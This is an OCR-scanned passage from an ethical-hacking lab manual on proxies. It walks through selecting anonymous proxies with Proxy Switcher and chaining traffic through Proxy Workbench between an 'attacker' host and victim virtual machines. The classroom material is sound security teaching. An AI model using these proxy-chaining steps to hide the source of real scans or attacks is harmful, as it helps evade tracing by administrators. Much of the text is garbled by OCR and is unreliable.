1 6 . S e le c t o n e Proxy server IP address f r o m r i g h t p a n e l t o s w i c h d i e s e le c t e d

p r o x y s e rv e r, a n d c lic k d ie
fTJ ic o n .

f lit
a (3 P ro x y S w itc h e r U n r e g is te r e d ( D ir e c t C o n n e c tio n ) 1~ l~a ! *

File Edit ,Actions View Help

3 #‫ □ ׳‬n [a a. a a if j \
Px»y Scanner £5 Server
2 \y
State
A Li s |

He>ponte
‫י‬/ | Proxy S«rvera

Lointiy
|X j

J•••‫ * ל‬New )766( f , 91.14444.65:3123 (Alve-SSU 10159ms “ SYRIAN ARAB REPUBLIC

rtgh Anonymous )0( ,.f 001.147.48.1U.ctabcrct (Alve-SSL 131 5‫־‬m [ J HONG KONG
& SSL)0< lx>stS4159?, ‫ל־‬1&‫־‬.aemef.95 (Alve-SSU 10154TBS 1 | ITALY
;‫־־‬B1te 01)0( f , 218.152.121.184:3030 Alh/e 10436ns REPUBLIC OF IQOREA
& } ‫ ־‬: Dead )2381( (Alve-SSU 13556ns ;-S W E D E N
^ In a d d itio n to sta n d a rd .......... Pemanently )6925( 95.110159.545080 (Alve-SSL:• n123me 1 ITALY
a d d / re m o v e / e d it fu n c tio n s Basic Anonymity )467' 3 i.5 6 .2 ‫־‬S.2-i.8GS:).. (Alve-SSU 10741ns
p ro x y m a n a g e r c o n ta in s h ‫ & ־‬Pn‫ ׳‬ate 116( i f 95.211152.218:3123 (Alve-SSU 10233ns ------NETHERLANDS
fu n c tio n s u s e fu l fo r
j‫ & ־ ־‬Dangerous )696!‫׳‬ f u54jpj1135aTTSjnocoJcr:• (Alve-SSU 10955ns REPUBLIC OF KOREA
r ‫&־‬ Proxy Ser/ere )0( , f 91.82.65.173:8080 (Alve-SSL) 11251m “ HUNGARY
a n o n y m o u s s u rfin g an d :— ProxySvtitcher )0( <f 86.1111A4.T94.3123 (Alve-SSU 10931ns ^ ^ IR A C
p ro x y a v a ila b ility te s tin g $ 4 ‫ד‬.89.130.23128 (AlveSSU 15810ns S3£5 KENYA
,f 9‫ ו‬14444863123 (Alve-SSU 10154ns “ SYRAN ARAB REPUBLIC

Ctaeblcd [[ Koep Alive ][ Auto Swtch |

218 152. 121.I84:8030tested as ((Alve-SSL:]

218.152.121.184:8030 tested as [Alive]
ha*»54-159-l 10-95senieriedieatiambait 8080te**d» (‫׳‬Alve-SSL)]
031.147.48.1K>.«atb.net/ig3tor.com:3123teatsd05[(ASveSSL)] P‫׳־‬

F IG U R E 1 2 1 2 S e le ctin g th e p ro x y se rve r

1 7 . T h e s e le c t e d pro xy se rve r w ill c o n n e c t, a n d i t w ill s h o w d ie f o llo w in g

c o n n e c t io n ic o n .

C E H Lab M anual Page 207 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy Switcher Unregistered ( Active Proxy: 95.110.159.54:8030 ‫ ־‬ITALY) I~ l‫ ם‬f x

p FFile
ik Edit Actions View Help

$5 Proxy Scanner Serve! State Response Comtiy

H * New !766) ^ 9 1 .1 4 4 4 4 65:3123 (Alve-SSU 10159ms “ SYRAN ARAB REPUBLIC
Ugh Anonymous (0) 001.147.48. ilS.etatic .re t.. (Alve-SSU 13115n* [ J HONG KONG
• g t SSL(O) , ? host54-159-110-95.server.. (Alve-SSU 10154ns | |IT A LY
H 2 ? a te (0» & 218.152.121.1(4:3080 Alive 10436ms > : REPJBLIC OF KOREA
B - R Dead (2381) , f dedserr2i23Jevonlme to n (Alve-SSU 13556ms ■■SW ED EN
P»m*n#ntly (G975) L 95 110159 54 8080 (Alve-SSU 11123™• I ITA tr
• f y 003‫״‬. Anonymity (4G7) (Alve-SSU 10740ms UNI ILL) ARAD CMIRATCS
Pnvate (16) , ? 95 211 152 21( 3128 (Alve-SSU 10233ms “ NETHERLANDS
| 0 ‫ ־־‬Dangerous (6961‫׳‬ u54aDJl133a‫׳‬r»unfl,co.kr:l (Alve-SSU 10955ms REP JBLIC OF KOREA
l‫ & ״‬My Proxy Servere (0) , f 91 82 £5 173:8080 (AlveSSU 1l251r»a “ HUNGARY
:—ProxySviitcha 25 ‫) ־‬0( g 86.111 144.194.3128 (Alve-SSU 10931ms “ IRAG
, ? 41.89.130^3128 (Alve-SSU 158101s g g K E N rA
£ 91 14444 86 3123 (Alve-SSU 10154ns “ SYRIAN ARAB REPUBLIC
>I ‫״י‬
Dsebicd 11 Keep Alive |[" Auto Switch

2l8.152.121.1&4:8030tested as [fAlve-SSL!
218.152.121.184:8030tested as (Alive]
host54-159-110-95 9»rverdedicati arnba 8080 ‫ ג‬tested as RAIve-SSL)]
031.147.48.116.atotc.nctvigator.con>:3123tested09 [(Mrvc SSL))

E a u c An on ym ity ML

F IG U R E 1213: S u c c e s fiil c o n n e c tio n o f selected p ro x y

£□ S ta rtin g from
18. G o to a w e b b ro w se r ( F ir e fo x ) , a n d ty p e d ie f o llo w in g U R L
version 3.0 Proxy
h t t p : / / w ^ v . p r o x y s w i t c h e r , c o m / c h e c L p h p t o c h e c k d i e s e le c t e d p r o x y
S w itc h e r
s e r v e r c o m i e t i v i t y ; i f i t i s s u c c e s s f u l l y c o n n c t e d , t h e n i t s h o w 's d i e f o l l o w i n g
in co rp o ra te s
in te rn a l pro xy fig u r e .

server. It is useful Detecting your location M07illa Firefox r 1 0‫ ־‬C x 1

3? £ri!t ¥"■'‫ '״‬History BookmorH Iool*• Jjdp
w hen you w a n t to
0*r»<ring your kxatkm..
use o th e r
4‫ ־‬-.IUU-..J.UU,I C *‘I Go®,I. f i f!

a p p lic a tio n s
(besides In te rn e t
E xplorer) th a t
Your possible IP address is: 2 0 2 .5 3 .1 1 .1 3 0 , 1 9 2 .1 6 8 .1 .1
s u p p o rt HTTP
Location: U nknow n
p ro xy v ia Proxy
S w itc h e r. By
Proxy Inform ation
d e fa u lt it w a its fo r Proxy Server: DFTFCTFD
c o n n e c tio n s on Proxy IP: 95.110.159.67
Proxy Country: Unknown
localhost:3 128

F IG U R E 121 4: D e te c te d P ro x y se rve r

19. O p e n a n o th e r ta b i n d ie w eb brow ser, a n d s u r f a n o n y m o s ly u s in g d iis

p ro x y .

C E H Lab M anual Page 208 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

proxy server Cerca con G oogle - Mozilla Fiiefox

rlc Edit yie* Histoiy Bookmark: Tools Udp

Ottecbngyour location.. | pray ic ‫־‬.« -C e r a con Google

^ <9wvwv gcogk.it ?hbft&g5_nf=1&pq-proxy 5wt*cr&cp^ 0&g?_<l-22t51.1t>f-taq-pro>fy‫»־‬scrvcr&pt-p8b1»- C ‫ ־‬Gccgie P *

*Tu Ricerca Immagini Maps Play YouTube Mews Gmail Document! Calendar Utao

G o o g le proxy server

03 A fte r th e an o n ym o u s
p ro x y se rve rs h ave b eco m e Ricerca
ava ila b le fo r sw itc h in g yo u
c a n a ctiv a te a n y o n e to
b e co m e in v is ib le fo r th e sites Proxy Wikipodia
y o u v isit. Immagin■
1 11
it.wkj ped a.org/tv k •Pioxy
In informatica e telecomunica^ow un proxy 6 un programma che si mleipone tra un
client ed un server farendo da trainee o neerfaccia tra 1 due host owero ...
Maps
Alt/i usi del termrne Proxy Pioxy HTTP Note Voo correlate
Video
Public Proxy Servers - Free Proxy Server List
Noose ivwiv publicpfoxyserveis conV Tiacua questa pagina
Public Proxy Server* is a free and *!dependent proxy checking system. Our service
Shopping
helps you to protect your Ktently and bypass surfing restrictions since 2002.
Ptu contanuti Proxy Servers -Sored By Rating -Proxy Servers Sorted By Country -Useful Links

Proxy Server - Pest Secure, rree. Online Proxy

ItaHa wvwproxyserver com‫• '׳‬Traduci questa pagma
Camtm localit.l Tho boet fin‫ ״‬Pioxy Sarvef out there* Slop soarching a proxy list for pioxies that are
never fa»1 or do noi even get onl«1e Proxy Server com has you covered from ...

Proxoit -Cuida alia naviaazione anonima I proxy server

F IG U R E 1214: S u r f u sin g P ro x y se rve r

L a b A n a ly s is

D o c u m e n t a ll d ie IP addresses o f live (SSL) proxy servers a n d th e c o n n e c tiv ity

y o u d i s c o v e r e d d u r i n g d i e la b .

T o o l/U tility In f o r m a tio n C o lle c t e d / O b je c t iv e s A c h ie v e d

S e r v e r : L i s t o f a v a ila b le P r o x y s e r v e r s

S e le c te d P r o x y S e r v e r I P A d d r e s s : 9 5 .1 1 0 .1 5 9 .5 4
P r o x y S w it c h e r
S e le c te d P r o x y C o u n t r y N a m e : I T A L Y

R e s u lte d P r o x y s e r v e r I P A d d r e s s : 9 5 .1 1 0 .1 5 9 .6 7

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .

Q u e s t io n s

1. E x a m in e w h i c h te c h n o lo g ie s a re u s e d f o r P r o x y S w it c h e r .

2. E v a lu a t e w h y P r o x y S w it c h e r is n o t o p e n s o u r c e .

C E H Lab M anual Page 209 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

In t e r n e t C o n n e c tio n R e q u ir e d

0 Y es □ N o

P la tfo r m S u p p o rte d

0 C la s s r o o m □ iL a b s

C E H Lab M anual Page 210 Eth ica l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab
w
1 3
i

D aisy Chaining using Proxy

W orkbench
Proxy Workbench is a uniquep/vxy server, idealfor developers, security experts, a n d
twiners, which displays data in real time.

I C O N K E Y L a b S c e n a r io
2 3 ‫ ־‬V a lu a b le
Y o u h a v e le a r n e d i n d ie p r e v io u s la b h o w to h id e y o u r a c tu a l IP u s in g a P r o x y
in fo r m a tio n
S w it c h e r a n d b ro w s e a n o n y m o u s ly . S im ila r ly a n a tta c k e r w i t h m a lic io u s in te n t
Test your can pose as som eone e ls e u s in g a p ro x y s e rv e r and g a th e r in fo r m a t io n lik e
k n o w le d g e
account o r bank d e ta ils o f an in d iv id u a l by p e r fo r m in g s o c ia l e n g in e e rin g .
‫ס‬ W e b e x e r c is e O nce a tta c k e r g a in s r e le v a n t in f o r m a t io n he o r she can hack in to th a t

in d iv id u a l’s bank account fo r o n lin e s h o p p in g . A tta c k e rs s o m e tim e s use

m W o r k b o o k r e v ie w
m u lt ip le p ro x y s e rv e rs f o r s c a n n in g a n d a tta c k in g , m a k in g i t v e r y d i f f i c u lt f o r

a d m in is tr a to r s t o tra c e d ie re a l s o u rc e o f a tta c k s .

A s a n a d m i n i s t r a t o r y o u s h o u l d b e a b le t o p r e v e n t s u c h a t t a c k s b y d e p l o y i n g a n

in t r u s io n d e te c tio n s y s te m w it h w h ic h y o u c a n c o lle c t n e t w o r k in f o r m a t io n fo r

a n a ly s is t o d e t e r m in e i f a n a tta c k o r in tr u s io n h a s o c c u rre d . Y o u c a n a ls o u s e

P roxy W o rk b e n c h to u n d e rs ta n d h o w n e tw o r k s a re s c a n n e d .

L a b O b je c t iv e s

T h is la b w i l l s h o w y o u h o w n e tw o r k s c a n b e s c a n n e d a n d h o w t o u s e P r o x y

W o r k b e n c h . I t w ill te a c h y o u h o w to :

■ U s e th e P r o x y W o r k b e n c h to o l

■ D a i s y c h a i n t h e W ’i n d o w s H o s t M a c h i n e a n d V i r t u a l M a c h i n e s

L a b E n v ir o n m e n t

T o c a r r y o u t th e la b , y o u n e e d :

■ a t D:\CEH-Tools\CEHv8 M odule 03 Scanning

P r o x y W o r k b e n c h is lo c a t e d
N etw orks\P roxy Tools\Proxy W orkbench

C E H Lab M anual Page 211 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f P ro x y W o rk b e n c h fro m

th is lin k h ttp ://p ro x y w o rk b e n c h .c o m

ZZ7 Tools
d em o nstrate d in I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n

th is lab are t h e la b m i g h t d i f f e r
a va ila b le in
A c o m p u te r r u n n in g W indow s Server 2012 as a tta c k e r ( h o s t m a c h in e )
D:\CEH-
Tools\CEHv8 A n o t h e r c o m p u te r r u n n in g W indow Server 2008, and W indow s 7 as
M odule 03 v ic tim ( v ir t u a l m a c h in e )
S canning
A w e b b ro w s e r w ith In te rn e t access
N e tw o rks
F o l l o w W iz a r d - d r iv e n in s t a lla t io n s te p s t o in s t a ll Proxy W orkbench

A d m i n i s t r a t i v e p r iv ile g e s t o r u n t o o ls

L a b D u r a t io n

T im e : 2 0 M in u te s

O v e r v ie w o f P ro x y W o rk b e n c h

P r o x y W o r k b e n c h is a p r o x y s e r v e r t h a t d i s p l a y s i t s d a t a i n r e a l t i m e . T h e d a t a

f l o w i n g b e t w e e n w e b b r o w s e r a n d w e b s e r v e r e v e n a n a ly z e s F T P i n p a s s iv e a n d

a c tiv e m o d e s .

L a b T a s k s

C S ecu rity: Proxy \ I n s t a ll P r o x y W o r k b e n c h o n a ll p la t f o r m s o f d ie W in d o w s o p e r a t in g s y s te m

servers provide a ‫׳‬W indow s Server 2012. W indow s Server 2008. and W indow s 7)
level o f s e c u rity
w ith in a - D:\CEH-Tools\CEHv8 M odule 03
P r o x y W o r k b e n c h is lo c a t e d a t

n e tw o rk . They S ca n n in g N e tw o rk s \P ro x y T o o ls \P ro x y W o rkb e n ch
can help preve nt ‫ר‬ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f P roxy W o rkb e n ch fro m
s e c u rity a tta c k s
th is l i n k h t t p : / / p r o x y w o r k b e n c h . c o m
as th e only w a y
in to th e n e tw o rk 4. F o llo w th e w iz a r d - d r iv e n in s t a lla t io n s te p s a n d in s t a ll i t i n a ll p la t f o r m s

fro m th e In te rn e t o f W in d o w s o p e ra tin g sy s te m
is via th e p ro xy _
T h is la b w i l l w o r k i n th e C E F I la b e n v ir o n m e n t - o n W in d o w s S e rve r
serve r
2012, W in d o w s S e rve r 2 0 0 8 ‫י‬ and W in d o w s 7

6. O p e n F ir e fo x b r o w s e r in y o u r W in d o w s S e rve r 2012, a n d g o to T o o ls
a n d c lic k o p tio n s

C E H Lab M anual Page 212 E th ic a l H ackin g and Counterm easures Copyright O by E C •Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Google Moiillo Fitefox

colt | HtJp

Qownloatfs CW-I
moderns
S<* UpS^K.
c m * v ‫*«״‬A
e •!1• -■cc9u fi *
♦You Search Images Web Developer Documents Calendar Mote •
Page Info
5‫ «ז‬1 £ ‫ו‬1*«)‫ ז‬6 ‫ ״ ז י ה י‬9 Sign n
Cle«r Recent U stsr. Cl 1+“ Sh1ft*IW

G o o g le
Gocgie Search I'm feeling Lucky

11
AtfM«t «Mg Piogammei Bumoeti SolUion* Piracy t Te •Google Aboul Google Google com

F IG U R E 13.1: F ire fo x o p tio n s tab

7. G o t o A dvanced p r o file in d i e O ptions w i z a r d o f F i r e f o x , a n d s e le c t d i e

N e tw o rk t a b , a n d d ie n c lic k Settings.
Options

‫§י & ם‬ % p 3
General Tabs Content Applications Privacy Security S>nc Advanced

f t T h e s o c k e ts p a n e l j
General | MetworV Update | Encryption j
sh o w s th e n u m b e r o f A liv e
Connection
s o c k e t c o n n e c tio n s th a t
P r o x y W o r k b e n c h is Configure h o * h re fo i connects to the Internet | S g t n g i.
m a n a g in g . D u r in g p e rio d s
o f n o a c tiv ity th is w ill d ro p Cached Web Content

b a c k to z e ro S e le c t Your w eb content cache 5‫י‬currently using 8.7 M B of disk space Clear Now

I I Override a u to m ate cache m anagem ent

Limit cache to | 1024-9] MB of space

Offline Web Content and User Data

You 1 application cache is c jiie n t l/ using 0 bytes of disk space Clear Nov/

M Tell me when a wefccite aclrt to store data fo r offline uce Exceptions..

The follow ing websites are a lowed to store data for offline use

B a r eve..

OK Cancel Help

F IG U R E 13.2 F ire fo x N e tw o rk Settin g s

C E H Lab M anual Page 213 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

8. C heck Manual proxy c o n fig u ra tio n 111 th e C onnection S e ttin g s w iz a r d .

S T he s ta tu s bar
show s th e d e ta ils 9. Type HTTP Proxy as 127.0.0.1 a n d e n t e r d ie p o r t v a lu e as 8080‫ י‬a n d check
o f Proxy d ie o p t io n o f Use th is proxy se rve r fo r a ll p rotocols, a n d c lic k OK.
W orkbench*s
a c tiv ity . The firs t Connection Settings
panel disp lays th e Configure Proxies to Access th e Internet
a m ou nt o f data O No prox^
Proxy W orkbench
O A uto-detect proxy settings for this network
c u rre n tly has in
O ii** system proxy settings
m em ory. The
(§) Manual proxy configuration:
a c tu a l am o un t of
HTTP Proxy: 127.0.0.1 Port
m em ory th a t
Proxy W orkbench @ Use this proxy server for all protocols

is consum ing is SSL Proxy: 127.0.0.1 Port 8080—

g e n e ra lly m uch £TP Proxy: 127.0.0.1 Port 8080y |

m ore th a n th is SO£KS H ost 127.0.0.1 PorJ: 8080v
due to overhead D SOCKS v4 (S) SOCKS ^5
in m anaging it.
No Proxy fo r localhost, 127.0.0.1
Example .mozilla.org, .net.nz, 192.168.1.0/24
O Automatic proxy configuration URL

Rgload

OK Cancel Help

F IG U R E 13.3: F ire fo x C o n n e c tio n Settin g s

10. W h ile c o n fig u r in g , i f y o u e n c o u n te r a n y p o rt e rro r please ignore it

1 1 . L a u n c h th e S ta rt m e n u b y h o v e r in g d ie m o u s e c u r s o r i n th e lo w e r - le f t

c o r n e r o f th e d e s k to p .

S c a n c o m p u te rs b y I P
ra n g e , b y d o m a in , s in g le
c o m p u te rs , o r c o m p u te rs ,
d e fin e d b y th e G lo b a l
N e tw o r k In v e n to r y h o s t
file 4 W indows Server 2012

WaoomW1P iW 2 taeneCjickttr 0H iK tT r
baLMcncowtuid MO.
g. - ?•
F IG U R E 13.4: W in d o w s S e rv e r 2012 - D e s k to p v ie w

1 2 . C lic k d ie Proxy W orkbench a p p t o o p e n d ie Proxy W orkbench w in d o w

C E H Lab M anual Page 214 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Server Windows Google Hyper-V

Manager PowerShell Chrome Manager

S T h e e v e n ts p a n e l Fa m • ‫וי‬
d is p la y s th e to ta l n u m b e r
o f e v e n ts th a t P ro x y Control HyperV SO I Server
Pand Virtual
W o r k b e n c h h a s in Machine ‫״‬
m e m o ry . B y c le a rin g th e
W
d a ta ( F ile ‫ > ־‬C le a r A ll
D a t a ) th is w ill d e c re a s e to Command MO? 113 Searct101_

z e ro i f th e re a re n o
c o n n e c tio n s th a t a re A liv e
£ Prompt

H
Firefox

O
dobai Proxy
Network Woricbenu.
Inventory

Detkc Si

F IG U R E 13.5: W in d o w s S e rv e r 2012 - A p p s

13. T h e Proxy W orkbench m a in w in d o w a p p e a rs as s h o w n i n d ie f o llo w in g

fig u r e .

Proxy Workbench H I
File V ie w T o o ls H e lp

& The la s t panel

d isp lays th e
‫ו ם‬
_‫עב ש‬

Monitorirg: WIND33MR5HL9E4 (10.0.0.7) Details for All Activity K N JH

m m
From To 1 Protocol | Started
c u rre n t tim e as SMTP • Outgoing e-mal (25) 173.194.36.24:80 (www g . HTTP
JJ127 .0.0.1:51199 18:23:39.3^
re ported by your ^ POP3 • Incoming e-mail (110) 127.0.0.1:51201 74.125.31.106:80 (p5 4ao HTTP 18:23:59.0‫־‬
& HTTP Proxji • Web (80B0) J l l 127.0.0.1:51203 173.194 36 21:443 (m aig HTTP 18:24:50.6(
o p eratin g system HTTPS Proxy • SecureWeb (443) J d 127.0.0.1:51205 173.194.36.21 M 2 (m a ig . HTTP 18:24:59.8'
^ FTP • File T!ansfer Protocol (21)
J d 127.0.0.1:51207 173.194.36 21:443 (maig.. HTTP 18:25:08.9‫־‬
Pass Through ■For Testing Apps (1000) W ' l ! ? 7 n n 1‫ו ל ו ^ ו‬ 173‫ ־‬K M TC. 71 •A n (m ‫־‬d ‫״‬ H T T P ____ 1 fi‫־‬jR - 1 fir

3eal time data for All Activity

000032 /I .1. .User—Agent 2f 31 2e 31 Od 0A SS 73

000048 : Mozilla/5.0 (¥ 3a 20 4d Si 7a 69 6c 6c
000064 indows NT 6.2; V 69 6e 64 6£ 77 73 20 4e
000080 OU64; r v :14.0) G 4f 57 36 34 3b 20 72 76
000096 ecko/20100101 Fi 65 63 6b 6f 2f 32 30 31
000112 refox/14.0.1..Pr ?2 b5 66 6f 78 2f 31 34
000128 oxy-Connection: 6f 73 79 2d 43 6f 60 6e
000144 koop-alivo. Host 6b 65 65 70 2d 61 6c 69
000160 : mail.google.co 3a 20 6d 61 69 6c 2e 67 ,
000176 m .... 6d Od Qa Od 0a

< III
>
1
Memory: 95 KByte Sockets: 1CO Events: 754 u n ; 1iciu ic . u n ; 11 7angwrrx?n— Luyymy. u n ; .
J
F IG U R E 13.6: P ro x v W o rk b e n c h m a in w in d o w

14. G o to T ools o n d i e t o o l b a r , a n d s e le c t C onfigure Ports

C E H Lab M anual Page 215 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy Workbench
File View IL^o o ls J Help

5
Monitoring: W
Save Data...

Configure Ports.
U- 3
=tails for All Activity
Failure Simulation... m n ih m
All Activity |10m | T0 I Protocol | Started ^
^ SMTF Real Tim e 9‫־י‬099 ‫• ח י‬ J 127.0.0.151199 173.194.36.24:80(w»w*.g.. HTTP 18:23:39.3}
POPd Options... tJ 127.0.0.1 51201 74.125.31.106:80|pt4ao HTTP 18:23:59.0‫־‬
& The *Show th e k # HTTP T‫־־‬TWny TTWU(WW) 3d 127.0.0.1 51203 173.19436.21:443(naig. HTTP 18:24:50.6(
real tim e data ^ HTTPS Proxy • Secure Web |443) £ J 127.0.0.151205 173.19436.21:443(na*g HTTP 18:24:59.8'
^ FTP • File T ransler Protocol (21)
;jd 127.0.0.151207 173.1943621:443(naig HTTP 18:25:08.9‫־‬
w in d o w ' a llo w s Pass Through ■For Testing Apps (1000) l1?7nn1-5‫־‬R1911 17‫׳‬n ‫*־‬c‫״* ול־‬n ‫ » ו*י׳ו‬HTTP ■ m - w ip r
>
th e u ser to
Real time data for All Activity
s p e c ify w h e th e r
000032 / l.1 ..User-Agent 2f 31 2e 31 Od 0a 55 73
th e re al-tim e d ata 000048 : Mozilla/5.0 (W 3a 20 4d 6f 7a 69 6c 6c
000064 indows NT 6.2; U 69 be 64 6f 77 ?3 20 4e
pane should be 000080 OU64; rv :14.0) G 4f 57 36 34 3b 20 72 76
000096 ecko/20100101 Fi 65 b3 6b 6£ 2f 32 30 31
displayed o r no t 000112 refox/14.0.1. Pr 72 65 66 6£ 78 2f 31 34
000128 oxy-Connection: 6f ?8 79 2d 43 6f 6e 6e
000144 keep-alive..Host 6b b5 65 70 2d 61 6c 69
000160 : mail.google.co 3a 20 6d 61 69 6c 2e 67
000176 m. . . . 6d Od 0a Od 0a

Memory: 95 KByte Sockets: 100 Events: 754 I eiiim a ic UII 11c1u4c. uu unuuic u i i L‫« ׳‬ty1c u n 1_<.yymy. u n ‫ ׳‬ju i

F IG U R E 13.7: P ro x y W o rk b e n c h C o n F IG U R E P o rts o p tio n

1 5 . 111 d i e C onfigure Proxy W orkbench w i z a r d , s e le c t 8080 HTTP P roxy - Web

i i i d ie le f t p a n e o f P orts to lis te n on.

16. C h e c k HTTP 111 d i e l i g h t p a n e o f p r o t o c o l a s s ig n e d t o p o r t 8 0 8 0 , a n d c l i c k

C onfigure HTTP fo r p o rt 8080

Configure Proxy Workbench

C L l P e o p le w h o b e n e fit
fro m P r o x y W o rk b e n c h Proxy Ports
Ports to listen on:
Home users w ho have taken Protocol assigned to port 8080
Port [ Description
the first step in understanding
25 SMTP • Outgoing e-mail ; >>Don't use
the Internet and are starting to
ask "B a t how does it work?” un PHP3 - lnnnmino ft-maiI : ■✓
18080 HTTP Proxy ■Web Pass Through
People who are curious about
how their web browser, email 443 HTTPS Proxy ‫ ־‬Secure Web HTTPS □
client or FTP client 21 FTP ‫ ־‬File Transfer Protocol POP3 □
communicates w ith the
Internet.
1000 Pass Through ■Foe Testing Apps ‫ ח‬FTP
People who are concerned
about malicious programs
sending sensitive information
out in to the Internet. The
inform ation that programs are
sending can be readily
identified.

Internet software developers

w ho are w riting programs to
existing protocols. Software
development fo r die Internet is
often verv complex especially
when a program is not
properly adhering to a &dd- | Qetete | | Configure H T TP tor poet 8080.|
protocol. Proxy Workbench
allows developers to instantly
identify protocol problems.
W Sho^ this screen at startup Close
Internet software developers
who are creating new
protocols and developing the F IG U R E 13.8: P r o s y W o rk b e n c h C o n fig u rin g H T T P fo r P o r t 8080
eluent and server software
simultaneously. Proxy
Workbench w ill help identify 17. T h e HTTP P roperties w in d o w a p p e a rs . N o w c h e c k C onnect via an o th e r
non-compliant protocol
: - T-1-■
> proxy, e n te r y o u r W indow s Server 2003 v ir t u a l m a c h in e I P a d d re s s i n

Internet Security experts w ill

Proxy Server, a n d e n te r 8080 in P o r t a n d d ie n c lic k OK
benefit fro m seeing the data
flowing in real-time This wiH
help them see w ho is doing
what and when

C E H Lab M anual Page 216 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

HTTP Properties

General

C On the web server, connect to port:

(• Connect via another proxy

Proxy server |10.0.0.7|

Port: Iftfififi

^ M a n y p e o p le
u n d e rs ta n d s o c k e ts m u c h
b e tte r th e n th e y
th in k . W h e n y o u s u r f th e
w e b a n d g o to a w e b s ite
c a lle d w w w a lta v is ta .c o m ,
y o u a re a c tu a lly d ire c tin g
y o u r w e b b ro w s e r to o p e n
a s o c k e t c o n n e c tio n to th e
s e rv e r c a lle d
" w w w .a lta v ia ta .c o m " w ith
p o r t n u m b e r 80

OK Cancel

F IG U R E 13.9: P r o s y W o rk b e n c h H T T P fo r P o r t 8080

18. C lic k C lose i n d i e C onfigure Proxy W orkbench w iz a r d a fte r c o m p le tin g d ie

c o n fig u ra tio n s e ttin g s

Configure Proxy Workbench

Proxy Ports
3orts to listen on:
Protocol assigned to port 8080
Port | Description
25 SMTP • Outgoing e-mail □ <Don't use>____________
110 POP3 ‫ ־‬Incoming e-mail
8080 HTTP Proxy - Web □ Pass Through
T h e re a l tim e lo g g in g
a llo w s y o u to re c o rd
443 HTTPS Proxy-Secure Web □ HTTPS
e v e ry th in g P ro x y
21 FTP ‫ ־‬File Transfer Protocol □ POP3
1000 Pass Through - For T esting Apps □FTP
W o r k b e n c h d o e s to a te x t
file . T h is a llo w s th e
in fo r m a tio n to b e re a d ily
im p o rte d in a sp re a d s h e e t
o r d a ta b a se so th a t th e
m o s t a d v a n c e d a n a ly s is c a n
b e p e rfo rm e d o n th e d a ta

Add delete Configure HTTP for port 8080

W Show this screen at startup Close

F IG U R E 13.10: P ro x v W o rk b e n c h C o n fig u re d p ro x y

1 9 . R e p e a t d ie c o n f ig u r a t io n s te p s o f P r o x y W o r k b e n c h f r o m Step 1 1 to Step
1 5 i n W in d o w s S e r v e r 2 0 0 8 V i r t u a l M a c h in e s .

C E H Lab M anual Page 217 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

2 0 . 111 W indow s Server 2008 ty p e d ie I P a d d re s s o f W in d o w s 7 V ir t u a l

M a c h in e .

21. O p e n a F irefox b ro w s e r in W indow s Server 2008 a n d b ro w s e w e b pages.

2 2 . P r o x y W o r k b e n c h G e n e ra te s d ie t r a f f ic w i l l b e g e n e ra te d as s h o w n i n d ie
& Proxy f o llo w in g fig u r e o f W indow s Server 2008
W orkbench
changes th is . Not 2 3 . C h e c k d ie To C o l u m n ; i t is f o r w a r d i n g d i e t r a f f i c t o 10.0.0.3 ( W in d o w s

o nly is it an S e rv e r 2 0 0 8 v ir t u a l M a c h in e ) .

aw esom e proxy
server, but you
Mcnfanj MN1r2CiU.‫׳;־‬43110002|
can see all o f th e | £4AOT*!>
^ SHIP 0.*!>>‫ו\»*<»׳‬1‫מ ן‬ 0‫ ל‬7 w Muon »105‫גג‬.‫זמ‬ 06.K2S.31T
data flo w in g ^1 CQC•) ■l^ff»-0^r»IH1(l
I.(flff:iilffllW'/tilHIUII 144a laccc » 0525&43 06052? ‫סט‬ A ‫׳•«־־‬-=‫־‬ UK
vr.
u -‫י‬
*0010041
laaaixzo
« 052*100
«05 261E
06052C92? CV9►*. ■ * 1 5 7
06®274B <V13r>M
4ca1facc tWJ
* « ‫? ׳•<״‬

through it, y HTI R F W -S.o i» W.6 (4431

6 FIP Hori^ra *<X0:d|71)
<1‫׳‬
*1‫נ^י‬
1000 )»#
Mtaiaon
®0526217
K.W263K
06 052* ‫*׳* ? מ‬SfwAcwirw* 1556
utre^rw r » 9 rM 0 ( a < rM . ‫נ מ ו‬
v is u a lly d isp la y a V p*m (110*i !-f« r»»njA«c*no301 * lira 1444 ]•cto te«it*1 KKrT 'V**►—* 1191 * —' ■‫״‬
